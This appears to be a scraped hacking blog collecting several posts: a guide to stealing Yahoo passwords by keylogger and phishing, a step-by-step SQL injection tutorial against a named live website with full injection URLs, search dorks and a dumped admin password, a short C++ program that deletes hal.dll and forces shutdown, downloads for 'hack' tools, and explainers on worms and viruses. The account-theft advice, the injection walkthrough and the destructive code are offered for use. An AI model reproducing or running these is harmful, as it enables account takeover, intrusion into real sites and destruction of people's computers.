Softwares, Hacks, PTC, Tips And Tricks = !! Details..........................................................

Labels

Unlock Yahoo when Account is Blockeds

This is a very easy but an awesome Trick. When you or someone else enters an incorrect login multiple times then Yahoo! locks the account for “security reasons” and you are unable to access your chat names. Cool thing is that, these are a piece of cake to unlock.All you need is a list of Yahoo servers to log in with. Every time you login, you are using what’s called a server to access yahoo. You login with a cookie, which is sort of like an information packet or ID proving that you are who you claim to be, and the account is yours.When people attempt to log your name in multiple times with a locking tool, all they are doing is logging in over and over with an incorrect password until your cookie expires, which means you will no longer be allowed to login. So, when you find yourself locked, what you need to do is refresh your cookie. But how can you do that when the yahoo server you were using has blocked you?Simple, find another server. Yahoo has servers all over the place. There are more than I’d care to count. I’ll include a pretty decent sized list with this tutorials. All you have to do is paste one of these servers in your browser and log in on the page you see. Unless you have been locked on that server as well, you will receive a fresh cookie and will be able to log in to messenger again.Tons of people try to go through their email and login there to unlock an account, but a smart locker will shut down your mail server first, then cut off your chat server. Most people don’t know what to do if the email is blocked, so they give up trying. That’s why I don’t even bother with the email method. I simply pick another server, log in, and I’m good to go. There are so many servers out there that it is impossible to lock them all. Even if they could, the lock is only for about 12 hours, and then you’re back in business.Some Yahoo Servers :http://cn.mail.yahoo.com/?id=77070 CHINA
http://edit.india.yahoo.com/config/mail?.intl=in INDIA
http://edit.europe.yahoo.com/config/mail?.intl=uk EUROPE/UK
http://login.yahoo.com/config/mail?.intl=cf FRENCH CANADIAN
http://my.yahoo.co.jp/ JAPAN
http://login.yahoo.com/config/login USAYahoo Chat Logins :http://hk.chat.yahoo.com/?myHome HK
http://tw.chat.yahoo.com/?myHome Taiwan
http://in.chat.yahoo.com/?myHome India
http://chat.yahoo.co.jp/?myHome Japan
http://chat.yahoo.co.jp/?myHome Korea
http://sg.chat.yahoo.com/?myHome Singapore
http://chinese.chat.yahoo.com/?myHome Chinese
http://cn.chat.yahoo.com/?myHome China
http://asia.chat.yahoo.com/?myHome Asia
http://au.chat.yahoo.com/?myHome Australia & Nz
http://dk.chat.yahoo.com/ Denmark
http://fr.docs.yahoo.com/chat/chatbylycos.html France
http://de.docs.yahoo.com/chat/chatbylycos.html Germany
http://it.docs.yahoo.com/chat/chat.html Italy
http://no.chat.yahoo.com/ Norway
http://es.docs.yahoo.com/chat/chatbylycos.html Spain
http://se.chat.yahoo.com/ Sweden
http://uk.docs.yahoo.com/chat/chatbylycos.html Uk & Ireland
http://ar.chat.yahoo.com/?myHome Argentina
http://br.chat.yahoo.com/?myHome Brazil
http://espanol.chat.yahoo.com/?myHome South America
http://mx.chat.yahoo.com/?myHome Mexico
http://ca.chat.yahoo.com/?myHome Canada
http://world.yahoo.com/ World of yahooCheers and Keep learning.

Yahoo Hack Pack + Free Donwload EnjOy!

This is a nice hack pack with very much yahoo hacks, i thing all the yahoo hacks in the world. My virus scan says HackTool, so no virusses. But you can run it with sandbox. Its a nice pack, download it :D. Enjoy!

Download here

How to Hack a Yahoo Password

Everyday I get a lot of emails from people asking How to hack a Yahoo password? So if you’re curious to know how to hack a yahoo password then this is the post for you. In this post I will give you the real and working ways to hack Yahoo password.

There are number of sites on the web that provide information to hack a Yahoo password. So what’s special about this site? The only special about this site is that we do not bluff and mislead the readers. We actually teach you the real and working ways to hack a Yahoo password rather than telling some nonsense tricks to crack or hack some one’s yahoo password.

THINGS YOU SHOULD KNOW BEFORE PROCEEDING

With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a Yahoo password: They are Keylogging and Phishing. All the other ways are scams! Here is a list of facts that you need to know about hacking Yahoo password.

1. There is no ready made software or program that can hack a Yahoo password just by entering the target username. If you come accross a site that claims to sell a program to hack Yahoo password then it’s 100% scam.

2. Never trust any Hacking Service that claims to hack a Yahoo password just for $100 or $200. All the hacking services are scams.

The following are the only 2 foolproof methods to hack a Yahoo password.

1. EASIEST WAY TO HACK YAHOO PASSWORD

Using keylogger is the easiest way to hack a Yahoo password. Any one with a basic knowledge of computer can use a keylogger without any problems. It doesn’t matter whether or not you’ve physical access to the target computer. The following are some of the frequently asked questions about keyloggers.

1. What is a keylogger?

A keylogger is a small program that records each and every keystroke (including passwords) that a user types on a specific computer’s keyboard. A keylogger is also called as Spy program or Spy software.

2. Where can I get the keylogger?

There exists hundrends of keyloggers on the internet. But most of them are of poor quality and fail to deliver a good performance. The two best keyloggers for hacking yahoo password are listed below.

SniperSpy (Supports Remote Installation)

Win-Spy (Supports Remote Installation)

For more information on keyloggers, installation procedure and FAQs please refer my previous post: How to Hack an Email Account

3. Which keylogger is the best to hack Yahoo password?

Both the above mentioned ones are best for hacking Yahoo. However I recommend SniperSpy since it is more reliable and has got a better advantage over WinSpy. To get a complete review of SniperSpy please see my new post Which Spy Software to Choose

If you’re really serious to hack a Yahoo password then I strongly recommend using either of the two mentioned keyloggers.

For a complete installation guide and more information on these two softwares visit the following links

1. SniperSpy 2. WinSpy

2. OTHER WAYS TO HACK YAHOO PASSWORD

The other most commonly used trick to hack Yahoo password is using a Fake Login Page (also called as Phishing). Today, Fake login pages are the most widely used techniques to hack Yahoo password. A Fake Login page is a page that appears exactly as a Login page of sites like Yahoo, Gmail etc. But once we enter our password there, we end up loosing it.

Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & password) are redirected to remote server and we get redirected to some other page. Many times we ignore this but finally we loose our valuable data.

However creating a fake login page and taking it online to successfully hack a Yahoo password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So if you are new to the concept of hacking passwords, then I recommend using the keyloggers to hack Yahoo. Because Keyloggers are the easiest way to hack Yahoo password.

HOW DOES WORMS WORK ?

People use e-mail more than any other application on the internet, but it can be a frustrating experience, with spam and especially e-mail worms filling our inboxes.

Worms can spread rapidly over computer networks, the traffic they create bringing those networks to a crawl. And worms can cause other damage, such as allowing unauthorized access to a computer network, or deleting or copying files.

What's a worm?

A worm is a computer virus designed to copy itself, usually in large numbers, by using e-mail or other form of software to spread itself over an internal network or through the internet.


How do they spread?

When you receive a worm over e-mail, it will be in the form of an attachment, represented in most e-mail programs as a paper clip. The attachment could claim to be anything from a Microsoft Word document to a picture of tennis star Anna Kournikova (such a worm spread quickly in February 2001).

If you click on the attachment to open it, you'll activate the worm, but in some versions of Microsoft Outlook, you don't even have to click on the attachment to activate it if you have the program preview pane activated. Microsoft has released security patches that correct this problem, but not everyone keeps their computer up to date with the latest patches.

After it's activated, the worm will go searching for a new list of e-mail addresses to send itself to. It will go through files on your computer, such as your e-mail program's address book and web pages you've recently looked at, to find them.

Once it has its list it will send e-mails to all the addresses it found, including a copy of the worm as an attachment, and the cycle starts again. Some worms will use your e-mail program to spread themselves through e-mail, but many worms include a mail server within their code, so your e-mail program doesn't even have to be open for the worm to spread.

Other worms can use multiple methods of spreading. The MyDoom worm, which started spreading in January 2004, attempted to copy infected files into the folder used by Kazaa, a file-sharing program. The Nimda worm, from September 2001, was a hybrid that had four different ways of spreading.

What do they do?

Most of the damage that worms do is the result of the traffic they create when they're spreading. They clog e-mail servers and can bring other internet applications to a crawl.

But worms will also do other damage to computer systems if they aren't cleaned up right away. The damage they do, known as the payload, varies from one worm to the next.

The MyDoom worm was typical of recent worms. It opened a back door into the infected computer network that could allow unauthorized access to the system. It was also programmed to launch an attack against a specific website by sending thousands of requests to the site in an attempt to overwhelm it.

The target of the original version of MyDoom attack was the website of SCO Group Inc., a company that threatened to sue users of the Linux operating system, claiming that its authors used portions of SCO's proprietary code. A second version of MyDoom targeted the website of software giant Microsoft.

The SirCam worm, which spread during the summer of 2001, disguised itself by copying its code into a Microsoft Word or Excel document and using it as the attachment. That meant that potentially private or sensitive documents were being sent over the internet.

How do I get rid of them?

The best way to avoid the effects of worms is to be careful when reading e-mail. If you use Microsoft Outlook, get the most recent security updates from the Microsoft website and turn off the preview pane, just to be safe.

Never open attachments you aren't expecting to receive, even if they appear to be coming from a friend. Be especially cautious with attachments that end with .bat, .cmd, .exe, .pif, .scr, .vbs or .zip, or that have double endings. (The file attachment that spread the Anna Kournikova worm was AnnaKournikova.jpg.vbs.)

Also, install anti-virus software and keep it up to date with downloads from the software maker's website. The updates are usually automatic.

Users also need to be wary of e-mails claiming to have cures for e-mail worms and viruses. Many of them are hoaxes that instruct you to delete important system files, and some carry worms and viruses themselves.

As well, some users should consider using a computer with an operating system other than Windows, the target of most e-mail worms. Most of the worms don't affect computers that run Macintosh or Linux operating systems.








Welcome to my very first tutorial for SQL Injection on Genius hackers. SQL Injection basically means to execute a query in the database which is connected to the website to get personal information out of it, which is not visible to a normal user. Database is most likely to be a part of the websites, which saves all the information like user names, passwords, posts, replies in it. So there is a possibility that you might put some commands or queries or requests whatever you want to call it into the database to get some hidden information out of it.

It is noticed that in the past SQL Injection have been used several times to steal the credit card information, E-mail address and passwords, because most of the users have same E-mail address and passwords into all of their E-mail accounts. So if you manage to hack one of the accounts, you may just get access to all of their accounts. SQL Injection is most likely used by the “Penetration Testers” to check if the website of their clients are vulnerable to some kind of attacks to steal the information. Here, in this article I will show you how do they do it. There are some simple terms expected out of you and one of them is that you understand the basic knowledge of the computer. This tutorial will let you know, how to start? where to stop? what to do? and if you have any further queries you can post them here and i will help you to work with it.

PLEASE REMEMBER: Nishant Soni or Genius Hackers take no responsibility of whatsoever damaged is made by you by this knowledge. This is just for the educational purposes so you can secure your own website.

I will divide this tutorial into some points so it can help you in a better way to understand the structure of the SQL Database which is working at the backend of the website to store, save and execute the information.

I will use a LIVE website in this tutorial, so you can try to test it on your own and believe me it really helps to develop your skills.

The website that I will use today is www[dot]rfidupdate[dot]com.

To understand what is an SQL Database, the very simple thing i can explain to you is the “website where you can register, login or create your own profile. Because it will save the data you input into your profile and will execute / display them whenever you provide the correct username or the password. So in the same way the website i mentioned above will give you a chance to be a part of it, it will update you daily about respective news.

1. How to check if the website is vulnerable to SQL Injection?
A:
On most of the website i read people saying that try to add “`” at the end [without quotes], and if you get some error that means that the website is vulnerable to SQL Injection. But being an experienced guy in the penetration, i’d rather tell you that this is a TOTAL MYTH. The best way to check the site vulnerability is to add “+order+by+6753″ at the end of the URL. Because, 97% of the websites don’t have more then 6753. columns. So by adding 6753 number, you will check if it has 6753 columns, which it apperatenly doesn’t have. So it will give you an error, and if it does that means that the WEBSITE IS VULNERABLE. It is generally noticed that a website doesn’t have more than 100 columns at the most in its database. So by entering the number 6753, you are trying to make it sure if the website gives you an error with it. IF it does that means you can proceed further. To check an SQL Injection, its mandatory that the website should be pointing it self to some specific page, i.e. “website.com/index.php?page=11″. So in this case the website is pointing it self to page Number.11 to pull up some specific information. So, to check if the website is vulnerable or not, you can try with the following URL. i.e. “website.com/index.php?page=11+order+by+6753″.

2. How would i find the vulnerable websites?
A.: Google is the best friend of Hackers
, when I say this don’t assume that i am just writing it because i am supposed it. I really mean it. There is something called as “google dorks”, which are basically a command which could be put into the Google search to find out specific groups of pages.
here are some Google dorks which you may try to find out the vulnerable websites.
a. inurl:index.php?page=
b. inurl:members.php?member=
c. inurl:index.php?id=
d. inurl:articles.php?page=

This will help you to find out the websites which are connected and working with SQL Databases at the backend. Some of them might be vulnerable to SQL Injection. So you can try to put “order+by+6753″ at the end of the URL to check if its vulnerable.

Step 1 : Finding Vulnerable Page.

Lets start, as you’ll know the website that i will test today is www.RfidUpdate.com. So lets open up the website in the browser. So just a little information about website, RFID means “radio frequency identification”. So on the right hand side you will see that it gives you an opportunity to subscribe to the website. So now it should give you an idea that when you subscribe to it, there has to be a place where your E-mail address should be saved, so it has to have a database! So, now we know that the website is supported by an SQL Database at the backend. So we are on the right track.

As I have written earlier, in order to perform an SQL Injection we will have to find a page that has “something.php?id=2121″ at the end of the URL, so we will try to find such page on RfidUpdate.com. I have found a page by exploring the website a bit. The URL of the page is,

http://www.rfidupdate.com/articles/index.php?id=1563


Image 1: SQL Injection (Click to enlarge )

So now, we know it has an SQL Database and we have the apge where we can start with.

So lets try to check if the website is vulnerable to SQL Attack, we will try to add “+order+by+6753–” as i have written earlier.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+6753–

Now, you should have noticed an error, which says :
“Error 1054: Unknown column ‘6753′ in ‘order clause’”

So, It means that the database gave u a message saying “there is no such column”. So error doesn’t really make any difference, but the main thing we should notice is that the database communicated with us directly. So there is a possibility that we can exploit it.

Step 2 : Finding Number of Columns.

Now, the next thing we will try is to find the out many columns do this page have. So now, instead of “6753″, we will start from number 1 then 5 then 15, we will keep doing this unless we get some error. So, try the following url.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+1–

The webpage opened up fine, which means that the website has more then 1 column, now try number 5.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+5–

Same thing, now try 10.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+10–

Still no error, try 15.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+15–

Still no error :( , try 20.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+20--

WHOA!, We got the error, which means that the number of columns in the webpage is between 15 to 20. So lets try with number “16″ now.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+16–

YAY!, you got the error on number “16″ as well. Which means, that the website has 15 columns. So now lets move further.

Step 3 : Using “Union Select All” Command.

Now, we will try to combine all the columns and we will see what do we get, the command goes as follow:-

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15–


Image 2: SQL Injection (Click to enlarge )

FYI:- please notice tha ti have added “-” before 1563.

Now you see some broken things in there, and now you see that the only indipendent number of column you see on the website is “7″. So apperantly that would be the base of the attack. Everything we do now, would be done with the column number “7″.

So we wil ltry to find the some more information about the DATABASE this website is using, so to do this we can replace the column number 7 with “@@version“, without quotes ofcourse. So try this now.

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15–


This is what you should see now,
5.0.67-community

Which means, that the website is using SQL Version > 5. Now, try following URL to move further.

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15+from%20information_schema.tables%20where%20table_Schema=database%20()–

Here, we have replaced No.7 column with “group_concat(table_name)” and we have added “from information_schema.tables where table_Schema=database ()” at the end. Which are basically the standard commands for SQL, to get the further information from the specific column.

YAY! You should have already noticed that the name of the further columns have appeared in the list and one of them is “ru_Admin”. Thats what we are looking for. Since we have the column for admin now, we will try to find out the username and password out of it. So let try following URL into the address bar.

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15+from%20information_schema.columns%20where%20table_Schema=database%20()–

The only thing we’ve changed here is the “tables” to “columns”, and you should see all the information about the admin’s tables now which should look something like following.

“ru_Admin_Username,ru_Admin_Password”

So we see, we might be able to crack the username as well as the password. In order to see the information inside the username and the password column lets put following URL:

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,group_concat(ru_Admin_username,0×3a,ru_Admin_password),8,9,10,11,12,13,14,15+from%20ru_Admin–

What we did is, to replace the columns names with admin_username & admin_password, and call it from ru_Admin column at the end.


VOILA! What you’re looking at right now the “admin” username and the password in following format.

username : password.

admin:admRIvuxHahkQ

FYI: Wherever you see “%20″ in the URL, that means a SPACE in the address bar.

So you have the password now, you can use it the way you want!.

So this the way to perform an SQL Injection attack. You may try your own stuffs with the google dorks i posted in the beginning. Use it the way you want, just keep in mind that if u know 80/100, there are people out there who know 90/100. So better secure your self first, and try these attacks with the permission of the site owners.

Thank you all for reading this tutorial, I am sure it helped. If there are any more questions feel free to revert back to the same post.

Enjoy Ethical hacking ;)

Today, we are listing 21 free and online web based applications which are very helpful for you to process your daily work. If you are designer, developer, office worker, manager, supervisor, student, home user, etc." class="ver">etc but we make sure to add something interesting for everyone. Most of them are not very well but, or begin a new sentence." class="ver">known but they are really amazing in respect to their features. Just take a look at them and share your thoughts here.

You are welcome to share if you know about any free web based application which our readers may like.

Phonevite
phonevite
Sending reminders and alerts, with your own voice, is easy and simple using Phonevite™. With this tool, you can send free phone reminders & alerts to yourself and/or your friends in 3 quick, easy steps.

Google Docs
google docs
You can import your existing documents, spreadsheets and presentations, or create new ones from scratch. Invite people to your documents and make changes together, at the same time. All you need is a Web browser.

crazyegg - visualize your visitors
crazyegg
Crazy Egg will help you improve the design of your site by showing you where people are clicking and where they are not.

Windows Live OneCare safety scanner
windows live one care
Windows Live OneCare safety scanner is a free service designed to help ensure the health of your PC.

hooeey - Record, retrieve and analyze your web hops
hooeey
hooeey is a personal web application that records all web links that you browse and lets you use them in a fun and productive way.

vuzit
vuzit
Vuzit is a web based document viewer you can embed in any web page. It’s fast to add and it’s free!

codepaste
codepaste
CodePaste provides an easy and convenient way to send/share PHP, C++, Javascript, Java, CSS, Actionscript and HTML code with others. Copy and paste the code and enter the email where you want the CodePaste to send it. CodePaste then nicely formats the code and sends it over.

Sprout Builder
Sprout
Sprout is the quick and easy way for anyone to build, publish, and manage widgets, mini-sites, mashups, banners and more.

infoencrypt - Online service for easy encrypt messages
infoencrypt
This is service for securing your messages in an easy way. All you need is only to enter a message text of your message and encryption password. The password will be used for both encryption and decryption. The system will encrypt your message using strong encryption algorithm, and it will be secure for sending. Anyone who intercepts the encrypted message without password will not be able to read original message.

Premier Survey
premiersurvey
Free survey software for online surveys, web surveys, email surveys. Free Online survey software for customer satisfaction surveys, employee satisfaction surveys, market research surveys.

Primo Online
Primo-online
PrimoOnline provides a super-fast way to create PDF files online, without the need to install any PDF software. Simply upload your file, enter your email address, and our server-based PDF creator will quickly convert it to PDF and deliver it straight to your email inbox.

postica - stick it! Create and share sticky notes
postica
Postica lets you create sticky notes, attach a file, and share them with your friends.

TinySong
tinysong
TinySong allows you to quickly share music links with your friends.

Adobe Buzzword
Adobe Buzzword
Adobe® Buzzword® is a new online word processor, perfect for writing reports, proposals, and anything else you need to access online or work on with others. It looks and behaves like your normal desktop word processor, but it operates inside a web browser, so there’s no installation required.

ShrinkFile.NET
shrink file
ShrinkFile.net is a free resource to compress your text documents, images, PDF files and other data online, because some computers don’t have WinZip or WinRAR installed. ShrinkFile.net will host the uploaded content at a static URL for one week, allowing you to share the file with family and friends.

Awesome Highlighter
Awesome Highlighter
Awesome Highlighter lets you highlight text on web pages and then gives you a small link to the highlighted page.

CreativePro Office
creative pro office
CreativePro Office is the most complete set of online office management tools you’re likely to find at any price - and it’s completely free! Manage your team, clients, projects, invoices, events from one web-based application.

ConceptDraw
ConceptDraw
ConceptDraw Visio File Converter is a free web service, provided by Computer Systems Odessa that is available to anyone who uses diagramming software and has a requirement to open Visio (VSD) documents. This service have been created because Visio users often don’t save their drawing into Visio XML (VDX) file format.

Hide My Ass
Hide My Ass
An anonymous free proxy service aimed at hiding your online identity. Use our service to hide your IP address and bypass your work/school web filter with ease.

RescueTime
rescue time
RescueTime is time management software that helps individuals and businesses understand how they spend their time, and provides tools to help them spend it more productively.

Picnik
Picnik
Picnik makes your photos fabulous with easy to use yet powerful editing tools. Tweak to your heart’s content, then get creative with oodles of effects, fonts, shapes, and frames.

WebMail Hack software with proof






Web Mail Hack 2.5v - Free videos are just a click away

Note: Please follow the septs carefully.

Watch full video for the instruction of the webmail hack, to know how to use the software

Before you run the Webmail hack you need to install Windows installer 3.1

CLICK HERE TO DOWNLOAD

and also required .Net Frame Works 3.5 to run the webmail hack

download link is available hear (197MB) .Net Frameworks 3.5 setup CLICK HERE

Here is the download link for Webmail Hack 2.4v:

CLICK HERE

People from US please Download from Uploading.com

Keygen 4 Webmail Hack 2.4v:

CLICK HERE it will ask to complete some offer just ignore and

please sign up below both the links and send your user id you will get the KEY with in 12hr.

CLICK HERE and register and complete at least one offer (free)

CLICK HERE and RegistEr(free) you need to upload atleast one file it could be any file any size.

once you though this process i could see your user name so please send both the user id's to below email ID, you will get the key .

POWERFUL C++ VIRUS Tutorial Full Guide Vedio








This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.

The Original Code:

Code:

#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:

Code:

#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.








This Incridable Virus Maker is 100% Free and I Love it.

This Program is made by D1sr3p41r3ds

I want to share it with you all!! If i got it wrong , Contact ME!

Reality of Virus

A computer virus is a program which intentionally makes copies of itself. It may contain some sort of "payload", which can be destructive or non-destructive program code, that is activated and run when certain conditions are fulfilled.

Legality of Viruses

The laws about writing and releasing viruses vary from country to country and state to state. In the US there are both Federal and State laws preventing damage to data and property, and these ensure that virus writers whose viruses infect large numbers of computers pay the penalty. David Smith, writer of the infamous Melissa MACRO virus, has been successfully prosecuted and awaits sentencing, with a possible fine of anything up to $150,000 and up to 10 years in prison.

In the UK the Computer Misuse Act makes it illegal to modify a computer without authorization, and this was successfully used to prosecute the author of the SMEG virus Christopher Pile, AKA the Black Baron, who received a total of 18 months in prison. During sentencing the judge commented that "those who seek to wreak mindless havoc on one of the vital tools of our age cannot expect lenient treatment". Not every country is so active in finding and prosecuting virus writers, however. A Taiwanese university only reprimanded and demoted the author of the highly destructive and costly CIH virus. Even just collecting viruses, passing source code and writing viruses for non-destructive purposes is illegal in some places, and any wannabe virus writer needs to understand the implications of the law, wherever they are based.

From a more hackish viewpoint I can understand the attraction of looking at the theory of virus writing, the appeal of studying virus source code to see how viruses work, the thrill of capturing and disassembling live viruses, and even, to some extent, the pride felt when writing a new virus as "proof of concept". All of this is fine, as it combines a very healthy curiosity coupled with sound technical skills, something that draws respect from hackers the world over. But, and it's a very big "but", the juvenile egotistic idiots who release these viruses "in the wild", often with their handle and the name of their group in it, have crossed the ethical border that distinguishes hacking from crime.

On a more personal note, I resent the amount of time wasted cleaning up networks of PCs after an infection, evaluating anti-virus software, installing anti-virus software and updating signature files - time that could have been put to more productive use, like hacking. Anyone who chooses to write a virus had better be sure that it never escapes, because if it causes major damage and the police break in their door, the authorities are not going to be convinced by any lame argument about "proof of concept".




How does a Virus Work?

Most viruses are written in assembly code for a specific computer and tightly tied to the operating system of the target computer. This enables them to protect themselves while continuing to spread the viral infection. But viruses don't have to be written in assembly language, and the growth of sophisticated programming languages embedded inside large software packages has allowed the spread of so-called "MACRO" viruses, which infect documents rather than programs.

Nearly everyone gets a virus from time to time, especially when they share floppy disks with friends. But if anyone starts downloading hacker tools from that hot new hacking web site, or start using warez from some dodgy ftp server, then they had better make sure that they have adequate anti-virus (A/V) protection. Although millions of computers are infected with viruses every year, the majority of cases are due to a small handful of persistent offenders out of the estimated 8,000 viruses in the wild.

Anti-virus software detects and removes viruses either by looking for a "viral signature", a string of bytes unique to that virus, or by using heuristic rules to look for "viral behaviour" which may indicate a program seeking to infect other files or cause destructive behaviour. The A/V software will have been programmed to understand how the virus detected hides itself, and will "clean" the infected file, boot sector or document thus removing the virus from the system.




Types of Virus

  • A "boot sector" virus occupies the boot sector of a floppy or hard disk and loads itself into memory during the boot-up sequence. Once in memory, it will attempt to infect the boot sector of any floppy disk used in the computer.
  • An "executable load" virus is a type of virus which attaches itself to executable files and runs when the program is started. Once in memory, it will attempt to infect other program files by attaching itself to them.
  • A "polymorphic virus" is a virus which encrypts itself, changing its viral "signature" each time using a "mutation engine" in an attempt to evade detection and destruction.
  • A "MACRO" virus is one which is written in a programming language embedded inside another program, such as a word processor. The commonest program suite targeted by MACRO viruses is the Microsoft Office group of applications, with the "Concept" and "LaRoux" viruses targeting Word and Excel, but any program which hosts a complex embedded macro programming language could be used to write such a virus.

Types of Payload

  • Viruses with non-destructive payloads play tunes, display banner messages or pop-up messages without causing any data loss, but they are a distraction, and they still need to be removed
  • Random destruction, where the virus changes odd bytes on disk or in memory, alters keystrokes at random, or messes around with the display.
  • Heavy destruction - the virus can cause the destruction of hard or floppy disks by low-level format, or data loss by wiping out a PC's File Allocation Table (FAT).
  • A new generation of viruses have a payload of Network Exploitation, use the Internet to copy themselves, and are more like "worms" than viruses. The notorious Melissa virus, which spread to a large number of computers in 1999, worked by infecting Microsoft Word97 documents then using Microsoft Outlook email software to email itself as an attachment to 50 people chosen from the infected user's email address book.

Getting Infected

Here are some of the ways of getting infected by a virus. Good A/V counter-measures start by recognizing the risk of infection from each source and taking appropriate steps in prevention.

  • The commonest cause of infection is shared floppy disks, but archive tapes and CD-ROMs can also be infected.
  • Any form of pirate software or warez, either downloaded from the Internet or BBSs, purchased or swapped with other warez traders.
  • Freeware or shareware software from a bulletin board, sometimes even when it appears to be from a trusted source.
  • Freeware or shareware from sources on the Internet, even when it appears to be from a trusted source.
  • Any form of email attachments, either programs or documents, are now suspect.



Virus Protection

Preventing viruses from attacking your system is a mixture of commonsense reasoning with some down-to-earth practical precautions, mixed with the use of one or more anti-virus packages to routinely check your system for infection. The level of protection you decide upon will depend on how much you would feel the loss of data if you were infected, and how much time you would spend cleaning up after the infection. A business user with many PCs and business-critical data at stake will be prepared to spend far more on A/V protection than the average home user, because the sums at risk are so much greater. Using appropriate anti-virus protection is at least as important in preventing catastrophic data loss as the backups you make routinely. (You *do* make backups, don't you?)

Commonsense Precautions


  • Never use pirate software or warez - not only is it illegal, but you don't know where it's been, or what might be lurking in there.
  • Always scan all freeware and shareware before use, even when it comes from what appears to be a reputable source.
  • Always scan all Internet downloads before installing and running, even when they appear to be from a reliable archive site.
  • Ensure that you scan all floppy disks you are given before use. This includes shared disks, pre-formatted blank disks and even distribution disks with original software on. Write-protect disks when not in use to prevent accidental infection.
  • Never run programs attached to email before scanning, even when you are sure they come from a trusted source. Save them and scan them before running or installing them.
  • Always scan any document attached to email before opening, or save the attachment and turn off macro features in the program you are using before opening it.
  • CD-ROMs and CD-RW disks should be scanned if your software allows it, but you will not be able to disinfect if you find a virus.
  • Make sure that you always have an updated signature file for your A/V package. This will ensure optimal A/V protection with signature-based A/V software.
  • Use more than one A/V package if you can, as there is a tendency for A/V packages to detect some viruses and miss others. Using multiple packages increases your chance of detecting something nasty before the infection spreads.
  • Make sure that you back up your data regularly and that you can restore successfully. Ensure that you have a virus-free boot disk to boot from in case of infection, and that you also have virus-free disks containing any tools or device drivers you need to recover your data and rebuild your system.

Using an Anti-Virus Package

If you haven't got an anti-virus package already, then you should. There are many around, both free and commercial. Try F-Prot if you need a free virus package, or get hold of free evaluation copies of commercial products such as Symantec's Norton Anti-Virus, McAfee's VirusScan, or ThunderByte and then buy the one you prefer. If you are protecting corporate data, you need to look at some of the disk control mechanisms available such as Reflex Magnetic's DiskNet, and also scan incoming email using a product such as MimeSweeper. There are many alternative products on the market, and you need to assess your degree of risk before evaluating the products to find one that suits you.

Once you have your anti-virus package, make sure that your machine is virus-free *before* installing the package, and then make sure that the signature file is always up to date. Some packages will automatically attach to the Internet at periodic intervals to download the latest signature file, but if you have read this far in the book you might have your own ideas about the wisdom of that, and would prefer to download the signature file yourself.




Writing Viruses

This section deals with writing viruses, but the reader isn't going to find a general tutorial here, nor will are there any great tips on writing a "killer" virus. As a hacker I don't condone the writing or spreading of viruses, but I have respect for the knowledge, technical skills and level of coding ability needed. What I hope is that by the time anyone who tries to code viruses gets to be *really* good at it, they will have realized that there are more technically challenging problems outside the area of virus development that are both more socially acceptable and better financially rewarded.

Assembling the Tools

If anyone wants to learn how to write a virus, they had better start by "assembling", pun intended, their tools. Here is a list of things someone will need to begin writing viruses:

  • A computer (*doh*), because it is hard to write programs without one!
  • A programming language of some kind, most probably assembly language, not just because viruses are written mostly in assembly language, but also because the novice virus writer will find most source code and tutorials will assume they are using assembly language.
  • A list of the opcodes or assembly mnemonics of the processor which are being targeted. Don't assume that, just because all the books of programming list 126 opcodes for a chip, that means there *are* just 126 opcodes. Some chips have "undocumented" opcodes that don't work right or have weird side effects. The venerable Motorola 6502 chip used in early Apple computers had an undocumented opcode whose mnemonic was HCF - Halt and Catch Fire - because it hosed the CPU.
  • A disassembler which will turn machine code into human-readable assembly language mnemonics. This will enable the novice virus writer to turn any live viruses they capture back into a computer program that they can read and understand.
  • A decent machine code debugger. SoftIce seems to be the favourite for PCs, but it depends on the platform that the virus is being written for.
  • Large and copious amounts of anti-virus software, both to protect themselve and to examine for clues on how to evade detection.

In addition to the basic tools a wannabe virus writer might need to acquire some of the following from the Internet.

Virus Source Code

Anyone can find virus source code in assembly or other languages very easily on the Internet. Once they have the source code, they can read it and understand how that virus works, or can re-assemble it and get a working virus. That's the theory, but a lot of the so-called virus "source" code kicking around the web isn't, and telling the difference between the two isn't easy unless the novice virus writer is already an expert in assembly language. For example, look at this snippet which purports to be from the STONED virus - the part that checks for infection and then infects the computer if not already infected.



PUSH CS
POP DS
MOV SI,200H
MOV DI,0
LODSW
CMP AX,[DI]
JNZ HIDEHD ;Hide real boot sector in hard drive.
LODSW
CMP AX,[DI+2]
JNZ HIDEHD ;Hide real boot sector in hard drive.

Table 10.1: Assembly language fragment of STONED virus which would infect the hard drive of a computer when run


